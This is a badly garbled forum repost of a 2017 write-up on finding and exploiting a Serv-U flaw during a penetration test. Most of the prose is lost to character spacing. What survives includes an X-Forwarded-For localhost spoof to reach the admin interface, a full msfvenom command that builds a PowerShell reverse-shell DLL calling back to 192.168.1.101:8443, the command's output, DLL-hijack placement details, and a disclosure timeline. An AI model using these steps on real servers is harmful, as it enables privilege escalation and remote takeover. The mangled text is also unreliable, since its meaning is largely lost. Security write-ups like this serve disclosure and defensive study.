[11210] 2017-04-06_看我如何在渗透测试过程中发现并利用Serv-U漏洞进行操作系统提权

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2017-04-06_看我如何在渗透测试过程中发现并利用Serv-U漏洞进行操作系统提权 S e r v - U c l o u d s   F r e e B u f   2 0 1 7 - 0 4 - 0 6 S o l a r W i n d s S e r v - U S e r v - U W i n 7 S e r v - U S e r v - U W e b 1 2 7 . 0 . 0 . 1 使 I P
W e b B u r p   S u i t e S p i d e r / ? C o m m a n d = L o g i n B u r p   S u i t e S c a n n e r X - F o r w a r d e d - F o r P O S T f u z z X - F o r w a r d e d - F o r 1 2 7 . 0 . 0 . 1 P O S T S e r v - U S e s s i o n P O S T F i r e f o x
S e s s i o n C o o k i e G E T S e r v - U h t t p : / / 1 2 7 . 0 . 0 . 1 : 4 3 9 5 8 / A d m i n / S e r v e r L i m i t s . h t m i n t e r g r a t i o n l i b r a r y D L L
m s f v e n o m D L L M F C 1 0 0 P W N . d l l r o o t @ 6 c 6 5 6 f : ~ #   m s f v e n o m   - p   w i n d o w s / x 6 4 / p o w e r s h e l l _ r e v e r s e _ t c p   L H O S T = 1 9 2 . 1 6 8 . 1 . 1 0 1   L P O R T = 8 4 4 3   - f   d l l   >   M F C 1 0 0 P W N . d l l N o   p l a t f o r m   w a s   s e l e c t e d ,   c h o o s i n g M s f : : M o d u l e : : P l a t f o r m : : W i n d o w s   f r o m   t h e   p a y l o a d   N o   A r c h   s e l e c t e d ,   s e l e c t i n g   A r c h :   x 6 4   f r o m   t h e   p a y l o a d   N o   e n c o d e r   o r   b a d c h a r s   s p e c i f i e d ,   o u t p u t t i n g   r a w   p a y l o a d P a y l o a d   s i z e :   1 8 1 0   b y t e s   F i n a l   s i z e   o f   d l l   f i l e :   5 1 2 0   b y t e s   r o o t @ 6 c 6 5 6 f : ~ #   f i l e   M F C 1 0 0 P W N . d l l M F C 1 0 0 P W N . d l l :   P E 3 2 +   e x e c u t a b l e   ( D L L )   ( G U I )   x 8 6 - 6 4 ,   f o r   M S   W i n d o w s D L L 1 9 2 . 1 6 8 . 1 . 1 0 1 : 8 4 4 3 M e t a s p l o i t l i s t e n e r M F C 1 0 0 P W N . d l l S e r v - u   w e b   c l i e n t   C : P r o g r a m   F i l e s R h i n o S o f t S e r v - U
D L L
D L L s h e l l S e r v - u 2 0 1 7 1 3 0 S h o d a n S e r v - U 1 5 , 0 0 0 S e r v - U 1 5 . 1 . 5 S e r v e r :   S e r v - U /   p r o d u c t : " R h i n o s o f t   S e r v - U   h t t p d " 0 1 / 1 3 / 2 0 1 7     S o l a r W i n d 0 2 / 1 7 / 2 0 1 7     S o l a r W i n d
0 3 / 2 2 / 2 0 1 7     * S p i d e r L a b s f r e e b u f c l o u d s F r e e b u f . c o m
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则